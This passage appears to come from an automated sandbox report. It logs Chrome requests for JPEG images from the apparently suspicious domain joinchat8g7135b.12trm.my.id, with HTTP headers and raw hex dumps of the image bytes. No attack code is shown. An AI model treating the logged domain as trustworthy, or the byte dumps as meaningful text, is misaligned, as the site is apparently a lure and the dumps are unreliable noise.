                          2024-05-27 22:30:14 UTC1369INData Raw: e9 d3 ff 00 c1 ff 00 1e ff 00 72 7f 7a dd 74 9e 2f 2c fc cb ed 2f f8 57 ff 00 6d db 17 f2 46 f6 7f 90 f9 af c7 b1 86 7f 92 5a 3d 77 3b 26 54 27 2e 33 1a 87 b2 da 68 2d 29 a8 28 d4 d4 30 c3 0c 69 6c cf 41 d9 5b 4f d3 9b 9d d9 54 78 5b 5e b6 c5 b7 9a e4 9f b5 2e 21 ea bb ef d7 22 c3 c9 f1 5d b6 f2 b7 1c f3 8a 9b 19 c3 49 42 f3 74 5f 4e d6 6e 48 bf 99 be 29 57 ab 9f 9d 5f 06 b9 74 60 8e bf 6d 16 70 38 4e a4 65 b7 3b f1 ab f4 cd c3 9d b8 21 55 fa 96 47 23 31 2b e7 66 32 70 5e ac fb 9d 36 9e 29 fe 40 65 43 93 dc fe 8e 2f 4d ab d5 bd 06 87 f1 eb ea ff 00 1c 03 d5 83 dd 7e 37 7d b6 03 f6 8f 37 8f 69 91 f8 e8 ff 00 b6 ed 89 f9 23 7b 59 f2 5f c8 9f 1e f9 97 ad 15 75 8c 93 6d cd ec 9b b1 de b1 4e 35 28 d6 35 4a b4 d4 d9 8d 58 af aa 4a b3 e9 78 ae ac 0c 30 c6 8d 2e
                          Data Ascii: rzt/,/WmFZ=w;&T'.3h-)(0ilA[OTx[^.!"]IBt_NnH)W_t`mp8Ne;!UG#1+f2p^6)@eC/M~7}7i#{Y_umN5(5JXJx0.
                          2024-05-27 22:30:14 UTC1369INData Raw: d8 3f 39 6f c0 c4 fc ab ec 7e 49 3f c8 7f 73 3a c5 14 51 5a 91 5d ab ca cc 55 e2 bd 8c 26 6e 03 df 3f cc 35 02 32 b1 f6 99 18 da 14 23 29 c9 3e 71 90 db 77 10 a9 03 fe eb fe 25 1a 17 56 77 88 a7 d5 0b f6 bc aa 3f e3 af e4 d2 9f 62 04 ce fb dd ea e1 30 48 08 37 fa 8b 7f 1f 4a 1f bb 3a aa fe dd 56 9b 71 ef 5e 36 1e cb 69 51 d2 d7 91 ea 0d fb c0 cc 0a f9 dd 5f 85 ea 57 f8 e9 d4 e9 73 2c f4 eb 76 e4 fe f3 a7 51 c1 4c d8 95 b7 7d fd 23 e9 6b 78 bb 5c 0b 29 f1 de af 15 f6 4f 9d 87 94 3f 3a fe 39 6d a9 bd b6 4f e0 e4 57 37 04 93 db 07 e5 2e f8 19 57 e5 5f 6f ef d8 5c be bf 52 6a c5 ec fc 55 ea 1b ca af c0 dc dc 2d 09 ed c8 08 b7 d7 c9 9d 75 97 60 2d 57 91 62 ee 5f 4e cb 56 26 4f e6 ff 00 1d a7 9e 4f 31 a0 65 a7 59 1c f7 57 b2 59 f1 c0 d6 d9 a7 c9 96 3f e3 ab e4
                          Data Ascii: ?9o~I?s:QZ]U&n?52#)>qw%Vw?b0H7J:Vq^6iQ_Ws,vQL}#kx\)O?:9mOW7.W_o\RjU-u`-Wb_NV&OO1eYWY?
                          2024-05-27 22:30:14 UTC1369INData Raw: cf 30 4a 17 9b e3 27 14 ec 65 9e d7 9f b7 a7 fb 9f e3 3e d7 fc eb f9 57 ed df fc 70 f2 6f 4c 4f 4c 4a 6a 05 f2 2a 00 59 8e be 99 ac 4f 48 4f 48 42 bc 17 97 ef 74 e1 cc 7a 42 51 56 a0 c6 52 32 68 fd a3 54 c7 c7 06 f7 ab 8a 36 3e ab c8 1b 9d 49 ff 00 7e cf 8f 4a 5e 3d 38 cd 42 b3 ca c4 b2 73 8e e2 39 96 6a 1f 76 6d 0d b5 ed 52 25 35 89 a9 a9 72 fd 81 be d2 9c 5f 1e d1 33 cf ec d1 77 1a a9 53 5b 55 60 61 cc 4e 42 7a 82 31 fb 1d 82 af e4 ba 91 a4 30 fb 99 96 27 4e f8 e5 fe 1a c1 2b 56 41 a9 69 46 b5 b2 0f 9f e8 0e c5 c9 4d 4a 6b e4 c0 b5 13 21 cd 8d a8 04 e9 95 f9 1d da 34 64 06 52 81 21 30 98 5a 7a 93 d5 82 e9 ea 88 2c 13 d4 9e a4 f5 44 36 8d 5b e5 ab 1e 55 bc 73 9c c4 e7 3a 76 47 e9 ae aa d1 62 13 31 cf ee 65 1f 19 2d aa 89 9c a6 e3 79 43 f9 7a 51 fb 77 2a
                          Data Ascii: 0J'e>WpoLOLJj*YOHOHBtzBQVR2hT6>I~J^=8Bs9jvmR%5r_3wS[U`aNBz10'N+VAiFMJk!4dR!0Zz,D6[Us:vGb1e-yCzQw*


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.449744188.114.96.34435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:14 UTC643OUTGET /vhsfhqpdhdsih6/img/bahan1.jpg HTTP/1.1
                          Host: joinchat8g7135b.12trm.my.id
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:14 UTC677INHTTP/1.1 200 OK
                          Date: Mon, 27 May 2024 22:30:14 GMT
                          Content-Type: image/jpeg
                          Content-Length: 9874
                          Connection: close
                          Last-Modified: Thu, 25 Aug 2022 05:16:38 GMT
                          Cache-Control: max-age=14400
                          CF-Cache-Status: HIT
                          Age: 5218
                          Accept-Ranges: bytes
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9EB3Pp%2BPtIrauJ61RCmwelIBiABC8sfBnk%2FrWMikZixuKHqW7mgBYEajm5raiN1ebDkOYZb2o6aupP36tuUEdzVXGVWka5%2BQy7XpGYWeWmcafnvFDKmDfku%2Fj55I9Aa4HFGo6jz2wtWPgxuagEQ%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 88a972c27f49434f-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:14 UTC692INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 09 06 07 13 13 12 15 13 12 13 15 16 15 16 18 12 15 15 18 15 15 15 15 15 16 15 17 15 16 16 15 15 15 15 18 1d 28 20 18 1a 25 1d 15 15 21 31 21 25 29 2b 2e 2e 2e 17 1f 33 38 33 2d 37 28 2d 2e 2b 01 0a 0a 0a 0e 0d 0e 17 10 10 1a 2d 1d 1d 1d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2b 2d 2d 2d 2d 2d 2d 2d ff c0 00 11 08 00 e1 00 e1 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 06 00 03 04 05 07 01 02 08 ff c4 00 4e 10 00 01 03 02 03 04 03 0a 08 0c 05 03 05 00 00 00 01 00 02 03 04 11 05 12 21 06 07 31 41 13 51 61 14 22 32 71 72 81 91 b1 b3 d1 35 42 53 73 92
                          Data Ascii: JFIF( %!1!%)+...383-7(-.+-------------------------------------------+-------"N!1AQa"2qr5BSs
                          2024-05-27 22:30:14 UTC1369INData Raw: e2 8e a5 12 66 31 b7 bb c8 c4 e9 b1 0a 98 20 95 82 28 9e d0 d0 62 8c 90 0b 1a ee 24 5c f1 28 6b fc e4 c5 fe 5e 3f a9 8b dc a0 ef 6d c7 fc 5e b0 7f 11 be ca 34 1c d1 74 11 e6 68 1f e7 1e 2f f2 d1 fd 4c 5e e5 3e 9f 79 58 e3 c5 db 2c 76 f9 a8 bd c8 3f 0e c1 4b 83 5d 6e 3a ad 1f 67 b0 40 63 17 09 2f 96 a3 57 15 ca 97 6f 2b 1d 06 c6 48 fe aa 2f 72 93 16 dd 6d 03 b8 49 17 d5 c3 ee 56 55 d8 48 cd 7b 68 94 50 e4 e0 12 7e a1 fe 23 be 9d 47 72 1d 56 d9 6d 0c 60 17 3e 2b 1f e1 c5 ee 51 0e f0 b1 e1 ff 00 bb 17 d5 45 ee 47 f4 4e 8e 78 ac e1 af 02 aa 2b f0 51 19 3d ed c7 22 ad b3 bd 71 51 89 83 01 23 75 d7 fd f1 05 1f bc 7c 74 71 92 3f aa 87 dc bc 8d e5 e3 9f 2b 17 d5 45 ee 56 75 b8 78 23 41 aa a0 92 8d cd 27 44 b3 aa c8 3d a7 47 0f 85 e9 b3 bd 23 10 3e 48 ff 00 42 3f
                          Data Ascii: f1 (b$\(k^?m^4th/L^>yX,v?K]n:g@c/Wo+H/rmIVUH{hP~#GrVm`>+QEGNx+Q="qQ#u|tq?+EVux#A'D=G#>HB?
                          2024-05-27 22:30:14 UTC1369INData Raw: ae 95 d2 b8 37 e2 37 ed 3d 65 66 dc 0b 98 fc ba 76 45 56 23 86 00 cb 1c 25 f7 65 ed 6b ea bc cd 7b a6 e9 25 b1 ca ac e3 a7 cc 2e 02 8c d1 2a 97 2b e1 06 ea e6 95 80 8d 42 6c 61 cf e4 d3 e8 57 18 66 18 f7 7c 5b 78 d0 16 31 ab 8e 55 88 35 5c 91 8f 6e a0 1b 22 a1 80 e9 77 1d 53 82 98 01 65 64 5f 73 4a 5e 33 b9 7b 80 b3 3a fc 53 90 42 d1 a9 2a ee b2 89 97 20 8b 75 2a 3a ca 6b 68 b3 be 3e 28 4d fa 4d 62 e3 73 93 2a ee 32 a7 19 9b 31 d3 82 8b 43 5b 94 d8 f0 4e d6 d3 91 af 25 56 e2 9f 89 02 ad 4c 3a dd 49 cf 94 b9 f5 97 93 9b 0b 83 70 55 76 0e db 57 53 76 cf 4f ed 5a b9 0d 41 02 c7 82 f7 83 b8 1a da 5f 9f 83 da b5 39 3b 98 48 84 bb 6a 2f b4 15 03 f8 ad f6 4c 4d ef 52 57 35 f4 f9 5c e1 f8 b7 70 24 7c 61 d4 a6 6d 3b 2f b4 75 00 fc a3 7d 93 15 66 f5 ea 98 f9 a1 6b
                          Data Ascii: 77=efvEV#%ek{%.*+BlaWf|[x1U5\n"wSed_sJ^3{:SB* u*:kh>(MMbs*21C[N%VL:IpUvWSvOZA_9;Hj/LMRW5\p$|am;/u}fk
                          2024-05-27 22:30:14 UTC1369INData Raw: fa 05 04 9b 17 0f f0 88 e9 a1 c2 e9 61 aa 73 1b 1c 91 b0 0c ee ca 09 75 9c 01 71 23 ad 0b ef 67 11 76 1b 48 29 a0 88 36 29 c3 9b 98 5e d7 b7 7c de 66 f6 37 04 9f 4d 95 6e fd 31 06 77 15 1c 31 3c 1c 8f 07 4e 59 62 2d ff 00 f4 14 ed e0 d5 45 5b 80 c0 ee 90 3a 46 36 9a 53 a1 b8 36 e8 de 7f 99 c9 be 1f 8b c9 fa 3f b6 f2 ec 2d f7 02 40 6f d3 60 71 4c 4f a9 fe c2 8e 7d 4e ac 6a c6 7b 71 e5 3e 50 14 6e a0 d7 57 eb 4d cd 8e b9 02 8d 88 47 b1 5d 04 18 34 3d d4 5a c8 9e ce fc b9 d6 07 39 b6 a7 97 10 15 5e f1 eb 7f c2 e8 ad 49 10 11 4f 76 97 b7 50 d7 16 e8 6f 72 6e 40 b8 e5 a7 98 d4 6f 5b 12 63 30 6a 58 62 75 ef d0 b1 d6 e4 3a 3b 9b df b5 a9 ec 52 b6 3a bd 98 00 bc 19 23 86 33 6d 6f 9a 17 ea 3e 8b 0a af 0f c6 02 e8 b2 32 6e c8 c0 b8 dd 65 54 b5 55 af 1c d9 6e 7a a1
                          Data Ascii: asuq#gvH)6)^|f7Mn1w1<NYb-E[:F6S6?-@o`qLO}Nj{q>PnWMG]4=Z9^IOvPorn@o[c0jXbu:;R:#3mo>2neTUnz
                          2024-05-27 22:30:14 UTC1369INData Raw: d5 2a 84 31 90 88 70 cc 55 bd 6a 4c 35 b7 e0 50 ac 11 d8 29 90 3e c8 4b 47 2b 98 53 25 4e 9c 50 c6 29 39 2e 22 ea de 8e ee 16 55 d8 c5 13 9b ad 94 b3 2d ae a4 0c 1e 8c 49 33 6f c0 6a 7c c8 ec c8 00 e4 00 1e 60 10 5e ce 4b df bb c4 af ea 25 1d 13 f3 0b 8c ae b8 eb 16 48 c8 37 1a 9e 8f c1 f0 05 d2 87 f5 24 dc b6 6b c1 17 04 10 78 10 6e 12 ba ce b7 7b 8b 49 d2 3a 1b 13 19 b9 17 d7 27 9d 10 e3 1b 5d 14 0f e8 c3 5c f9 34 d1 bc 2e 78 6a 85 b4 ec 1b 68 e6 1e 0d 76 2c 98 7c e6 3b 40 34 6f de 12 9d 45 95 1d 36 13 9a a5 85 be 13 25 84 f8 d9 9d a6 ca 6e 1d 5c e9 22 0f 7c 66 37 1b f7 a4 ea ac f6 4a 01 25 5b 8f ea 88 cf 9f 35 d5 62 04 3d 4b d6 22 e4 d2 bb 7b 0b 13 2a de e7 c2 f5 9e 5b 7d 9b 14 ad d0 62 02 3a e0 c3 c2 56 96 ff 00 b8 6a 14 7d ec 8f cf 15 9f 38 df 64 c4
                          Data Ascii: *1pUjL5P)>KG+S%NP)9."U-I3oj|`^K%H7$kxn{I:']\4.xjhv,|;@4oE6%n\"|f7J%[5b=K"{*[}b:Vj}8d
                          2024-05-27 22:30:14 UTC1369INData Raw: ec 6b bc a0 0a 8a dc 2a 9c 1b b6 36 82 ba c8 cf 11 c1 77 32 54 30 ee 05 06 20 7e 63 e4 81 a0 4e 51 bf bf 67 94 df 58 51 0b d7 ba 39 3f 18 cf 29 9f 78 2b b8 aa ee 62 db d8 f8 62 b3 e7 1b ec d8 87 a3 76 88 a7 79 f1 df 18 ac f2 db ec 98 87 04 16 54 dd cc 26 40 a8 1a ad 93 76 f8 ff 00 74 40 23 71 1d 24 62 c7 ac b7 91 59 15 4c 69 cc 0b 16 92 96 66 cb 19 b1 07 51 c9 c3 98 2a 56 e1 0b 13 54 fa 34 33 82 a8 da 1a 27 c8 dc ac 75 bb 57 ad 9c da 08 ea a3 0f 61 1a 8e f9 b7 d4 1e 6a e1 b1 a4 f3 eb 37 06 06 66 74 db 1a 1a fc d3 48 5f d8 ae 60 d9 4a 77 70 04 79 ca 20 96 82 ee 56 94 14 6d 68 55 37 e2 cc b8 d6 46 c0 b6 62 08 ec 72 02 7b 75 f5 a2 6c e1 a2 c0 00 07 50 b2 82 0a f7 72 8e 62 cd 9c e4 69 e6 a6 5b aa 9a b9 14 e9 95 55 49 d5 43 16 0c ab ae 97 44 1f 87 55 5f 16 a2
                          Data Ascii: k*6w2T0 ~cNQgXQ9?)x+bbvyT&@vt@#q$bYLifQ*VT43'uWaj7ftH_`Jwpy VmhU7Fbr{ulPrbi[UICDU_
                          2024-05-27 22:30:14 UTC1369INData Raw: f3 04 08 69 84 b6 5e 0c fa 39 25 c4 96 f9 92 7c cf be f8 ff 00 3b 4c 7f 72 0f 64 d4 1c c6 e8 8e 37 d4 df ce b3 79 30 7b 36 a0 d6 37 44 a2 79 8a be 4c 8e e0 a3 4b 1a 98 f6 26 cb 54 97 09 b6 4b 69 c8 b4 13 9b 8e 0c 71 f5 14 61 3c 77 0b 23 31 a2 ad 9b da 27 36 d1 4b 72 de 01 dc c7 61 4b 74 f5 11 f8 f2 d7 06 59 d7 d2 5e e3 92 93 b2 bb 23 d3 47 26 a0 65 70 f3 dc 5d 4e 92 30 75 0a e3 62 e7 ca f7 c6 78 3a c7 ce 10 a7 ea a3 36 61 1f 70 32 35 36 0e da 67 5d a6 e7 82 b1 6d 6f 25 3f 19 80 71 1e 35 40 6f 7e 0b 58 50 9f a6 77 b1 11 95 39 1d 42 1a 19 f5 4d ed 11 bc b1 11 c9 84 7d aa 25 21 e0 bd 62 33 dc 81 d4 ad 9e d6 60 d4 e1 d8 77 08 cc 8a 35 36 93 c5 f3 91 fd f0 9e 2a a6 ae ab 2c f4 ed 1c 4c d0 5f c5 d2 35 65 63 42 72 dc c1 8d ea 56 31 b8 9d 63 48 39 ba 41 c2 df 25
                          Data Ascii: i^9%|;Lrd7y0{67DyLK&TKiqa<w#1'6KraKtY^#G&ep]N0ubx:6ap256g]mo%?q5@o~XPw9BM}%!b3`w56*,L_5ecBrV1cH9A%
                          2024-05-27 22:30:14 UTC968INData Raw: 69 9e d9 0d ce b7 1c 90 bc 5b d4 6b 69 da de e4 0e aa ee 7e e4 7c c6 42 1a 63 17 ca 72 01 c6 fa a9 24 9b b6 1b 05 45 4e f9 ea 5b 2c 8e 86 0a 86 36 a2 9e 38 f2 3a 36 4a 01 63 62 73 8d 8f 84 de cb 78 94 8d 9d d9 2c 32 5a 29 6b da c7 da 08 aa db 34 53 3a ee 12 81 9a 27 9b 5a c7 2f af b1 0a 4d b6 18 9d 53 e6 74 51 9b d4 77 3e 71 0c 2e 70 cd 01 06 37 0b de c6 e3 55 2e 9f 65 b1 ea 97 4c 7a 39 da 2a 48 33 97 b9 b1 36 4e ac ed b8 f5 29 24 24 ff 00 d3 c5 6f fd 5c 1d 91 ca 3e d6 9f e8 b4 ca e7 92 82 77 61 b0 95 38 74 92 cd 50 f8 ee f6 64 0c 61 2e e7 7b 93 6b 72 45 f3 be eb 3e 4e 66 8c 40 c8 72 b2 e9 93 02 98 1a bd 88 c2 55 4d 12 24 50 29 78 6c 60 4d 1f 96 df 5a 5d 1a 7a 89 bf 8e 8f cb 6f ad 0d 72 25 96 e0 c3 24 92 49 6f 9c d9 88 6f 25 f6 c4 e5 f2 61 f6 6d 42 b5 b1
                          Data Ascii: i[ki~|Bcr$EN[,68:6Jcbsx,2Z)k4S:'Z/MStQw>q.p7U.eLz9*H36N)$$o\>wa8tPda.{krE>Nf@rUM$P)xl`MZ]zor%$Ioo%amB


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.449746188.114.96.34435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:14 UTC639OUTGET /vhsfhqpdhdsih6/img/01.jpg HTTP/1.1
                          Host: joinchat8g7135b.12trm.my.id
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:14 UTC677INHTTP/1.1 200 OK
                          Date: Mon, 27 May 2024 22:30:14 GMT
                          Content-Type: image/jpeg
                          Content-Length: 6920
                          Connection: close
                          Last-Modified: Thu, 25 Aug 2022 05:06:54 GMT
                          Cache-Control: max-age=14400
                          CF-Cache-Status: HIT
                          Age: 5218
                          Accept-Ranges: bytes
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UPByk274RmStijzJthiWhUm%2FDscajGT2me32BDlRbyXWP22gj0NZPllaOoTLDoMKv0EpGcg5l%2FnmU0ptAzJM8ddeSnmCxPiFAZxN%2F0IxxNQSKo8mvfzLX3l54UjBecRBrUpO5tlphKU%2FbQkKjDM%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 88a972c6cffb80df-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:14 UTC692INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 0a 07 08 15 16 15 18 15 15 15 18 18 18 18 1a 18 18 18 18 19 18 18 18 1a 12 18 18 18 1a 19 18 18 18 18 1c 21 2e 25 1c 1e 2b 1f 18 18 26 38 26 2b 2f 31 35 35 35 1a 24 3b 40 3b 33 3f 2e 34 35 31 01 0c 0c 0c 10 0f 10 1a 12 12 1a 34 21 1a 21 31 31 34 31 34 34 31 34 34 34 34 31 34 34 31 34 34 34 31 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 31 34 34 34 31 40 34 3f 34 31 34 34 3a 31 ff c0 00 11 08 00 e3 00 de 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 00 01 02 03 04 06 07 08 ff c4 00 40 10 00 02 01 02 04 03 05 05 06 04 05 03 05 00 00 00 01 02 00 03 11 04 12 21 31 05 41 51 06 22 61 71 91 13 32 81 a1 b1 07 42 52 72 c1 d1 62 82 e1
                          Data Ascii: JFIF!.%+&8&+/1555$;@;3?.4514!!11414414444144144414444444444444444414441@4?4144:1"@!1AQ"aq2BRrb
                          2024-05-27 22:30:14 UTC1369INData Raw: 42 9f c2 c6 e2 00 e9 ea 57 88 41 5c 13 8e 52 c4 a6 7a 6d b6 8c bf 79 0f 8f 58 51 4c 28 04 e2 bc 6b c7 11 d0 a3 89 29 01 27 15 a2 0d 68 f1 45 19 32 0a 39 31 a3 c2 01 a3 c6 8f 00 0e 42 9d 32 d7 45 0a 48 73 70 46 52 8a 45 b3 f8 de 6e c0 25 89 52 f9 b2 00 a6 e3 50 d6 e4 66 4c 26 18 bb b1 04 0d b3 15 2c 09 e6 a4 37 35 f0 9d 1e 1b 0e 32 dc a8 be e6 dc ce d7 96 d5 61 af 96 f3 a4 59 87 1a 4b a3 a4 72 25 4d 99 19 03 2b ac 0e 53 94 d9 ac 6c 77 b1 b6 9a 4b 0c 6b 48 44 02 ec d7 18 7c 48 7c ea 14 a1 08 40 e6 d6 37 3e 10 6f 1b a9 7c 4d ae 06 55 40 a4 f5 25 b3 7c a5 bd 89 4b 1c 57 ff 00 79 1e 97 99 31 6c 1a b3 b9 5c d6 6b 2f 90 23 5b 78 18 c8 d3 c5 29 53 3c e7 87 16 7e 28 57 31 b2 d4 73 96 e7 4b 0d fe 73 d6 d0 7f 9f 7e 80 fd 2d 38 6e 03 84 4f f1 8e fa 17 67 73 70 2d 61
                          Data Ascii: BWA\RzmyXQL(k)'hE291B2EHspFREn%RPfL&,752aYKr%M+SlwKkHD|H|@7>o|MU@%|KWy1l\k/#[x)S<~(W1sKs~-8nOgsp-a
                          2024-05-27 22:30:14 UTC1369INData Raw: a4 8f a2 f8 01 ff 00 4d 40 ff 00 f1 27 cd 04 23 78 3f 84 a6 5a 34 87 e1 a6 83 d1 00 fd 26 e0 d7 97 a1 09 83 1e 42 f2 41 a2 e8 30 78 a2 02 38 8e 98 a3 5e 49 4c 89 8a 12 16 5e 44 98 c2 28 18 30 13 85 c4 78 4d 75 cf 76 06 a5 5b 9d ad e7 34 e2 6b 59 47 49 7b 93 5d 71 bd 34 ab 39 27 2d 87 bb 70 75 23 c4 fa 41 f5 96 d5 8d c2 e5 28 4b 0d 01 62 08 b2 81 cc 6a 77 9a 30 d8 92 e8 48 20 01 a1 be fb 6f e9 04 3b 53 cf 9c 66 a9 50 66 ca bb 82 00 20 12 00 b5 b7 b4 12 85 99 f7 a5 85 19 2a 3b d3 2d 95 d9 0b 87 70 11 7b b9 3b 9a 77 4e 51 b7 39 9f 88 d5 47 aa 00 00 64 57 4b 81 97 2a fb a4 16 3c ad 7d 37 30 8a 3a 37 74 83 c8 bf 3d 6d 75 ee fe 9c ad 28 c3 d5 46 2e c7 2b 66 70 4d c3 1d 2c ca bb 0d 08 08 4f f3 18 71 0c ba ec af d9 a9 a6 e8 84 2b 95 5b 5c f7 ac bf 78 6b ae e7 d6
                          Data Ascii: M@'#x?Z4&BA0x8^IL^D(0xMuv[4kYGI{]q49'-pu#A(Kbjw0H o;SfPf *;-p{;wNQ9GdWK*<}70:7t=mu(F.+fpM,Oq+[\xk
                          2024-05-27 22:30:14 UTC1369INData Raw: a0 ae 74 40 f5 9b c9 56 cb 71 e7 3c d7 8e 63 9a bd 47 ab c9 bb aa 3a 28 da 75 1d ab c6 94 7a d9 49 d5 52 98 d7 5b 6e d3 8b 3a 69 d0 7a c9 c1 3d 69 9f 9a bf 0a f0 e9 de 03 a7 d6 7a 37 66 bb 24 59 05 57 5f e5 3a 1f cd e5 32 7d 9e 70 04 76 f6 d5 05 d4 7b a0 ec cd ce fe 02 7a c2 28 d3 e5 6d 2d 25 f3 63 c4 24 ac 47 31 4f 81 86 7a 64 00 12 9e 63 6e ad 6b 29 f8 6b eb 0e 51 c2 28 e5 36 b5 01 fd 63 84 8f 1c d2 ff 00 f4 3e 44 1a 82 da d6 80 b8 c7 03 0e a4 f8 6f d3 e1 3a 30 b2 38 94 ba 30 f0 3f 49 a1 39 a4 2f 93 3c 23 8d 87 72 0d 54 d0 13 95 d4 58 d8 68 33 7e 23 a7 84 15 4a 91 37 2a 2f f7 58 6c 1f 98 b7 e1 6f ac f6 2c 5e 0d 32 ea 96 b9 b1 cc 2c 2f d4 48 f0 de cd 51 2f 9c 28 2a ea c9 58 1f 76 a0 3a ab 29 e4 c0 da c6 25 52 91 33 f5 9c 27 64 f8 af b1 7c d7 3a 80 18 73
                          Data Ascii: t@Vq<cG:(uzIR[n:iz=iz7f$YW_:2}pv{z(m-%c$G1Ozdcnk)kQ(6c>Do:080?I9/<#rTXh3~#J7*/Xlo,^2,/HQ/(*Xv:)%R3'd|:s
                          2024-05-27 22:30:14 UTC1369INData Raw: bb 58 6d cc cc 2a d6 4a 96 d8 29 ff 00 a8 4a ea bd c5 ba 46 0f 74 71 7b 5c 01 f3 95 af e8 d5 c9 c4 a6 00 2a 6e 5b e3 68 4f 06 bd e4 6e 88 01 f9 cc 9e cf 5c bd 1c 83 e1 99 41 06 16 c0 52 b3 65 3a 58 5b 5e 7c c7 d6 3f 27 a3 07 14 f6 18 c2 b6 5b 11 ce 12 a1 89 3c e0 8a 49 65 b7 42 26 f4 60 27 3e fd 9a f0 37 43 15 08 61 f1 9a 4e 7e 89 d6 e0 13 08 52 46 e8 62 36 25 2c 0a ff 00 8a 8f fe 22 65 a5 41 8f 29 a0 61 4c 02 b6 87 6c 41 95 b6 28 c9 b6 19 ba 4c 95 68 91 f3 93 7f 00 68 5c 55 cc cf c7 3b 46 30 e9 95 08 35 9c 11 4d 46 b9 7a bb 81 b0 1f 38 07 1b c6 d1 03 15 6b e5 e7 be 63 f8 54 73 24 cc 1d 9c c1 35 4a a7 13 5b 52 e4 31 5f e1 1e ea f9 4d 5c 1c 5f b4 57 48 ee 3b 37 49 e9 61 d0 13 76 61 9d f3 6e 5d ce 66 bf 8e b0 d0 c5 75 03 e0 60 75 c5 08 9f 18 3a ce 82 a4 96
                          Data Ascii: Xm*J)JFtq{\*n[hOn\ARe:X[^|?'[<IeB&`'>7CaN~RFb6%,"eA)aLlA(Lhh\U;F05MFz8kcTs$5J[R1_M\_WH;7Iavan]fu`u:
                          2024-05-27 22:30:14 UTC752INData Raw: 1e dd e2 8e 36 b1 ef 1f fb 84 29 ed 5b 67 5c f6 fb eb a1 1e 6b ce 61 a7 e4 f4 c5 74 f4 d4 94 f9 a9 b1 f9 1f 84 90 ab 63 67 16 3d 46 c7 f6 91 56 16 b8 37 eb 6d c7 98 88 90 46 ba 8f a4 42 97 d9 78 4b ed 11 49 98 ad bd d3 fd 3c c4 9a bb f5 06 40 e1 61 a6 3a 49 aa db 62 65 42 b9 e6 84 78 8d 64 d2 aa 9f bc 3c b6 84 56 5c 0c 98 69 55 e3 03 0e 8a d1 a4 ea 08 ea 08 81 bd 99 04 83 cb 43 0b a3 c1 f8 b1 df 62 26 cf 8b 5e d1 5b e8 7e 52 d5 51 20 bb 4b 94 4d 80 10 11 c4 63 1c 08 52 03 18 c9 05 8a d1 c4 6c 01 21 14 51 47 49 00 71 25 69 00 d2 41 a4 c2 1e 6b 45 f5 60 a7 de 5b 9f 13 ce fe 31 f1 6d 99 41 25 b4 de ec 6f f0 e9 32 60 b7 3e 36 b4 bb 10 0d ac 79 f3 88 cf 4e a1 26 42 8e 88 41 39 95 49 20 11 f1 de 0b a9 58 96 24 9d fe 86 6c ac c0 26 9a 7e b0 53 ca 69 85 ca 28 c5
                          Data Ascii: 6)[g\katcg=FV7mFBxKI<@a:IbeBxd<V\iUCb&^[~RQ KMcRl!QGIq%iAkE`[1mA%o2`>6yN&BA9I X$l&~Si(


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.449747188.114.97.34435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:14 UTC380OUTGET /vhsfhqpdhdsih6/img/bahan1.jpg HTTP/1.1
                          Host: joinchat8g7135b.12trm.my.id
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
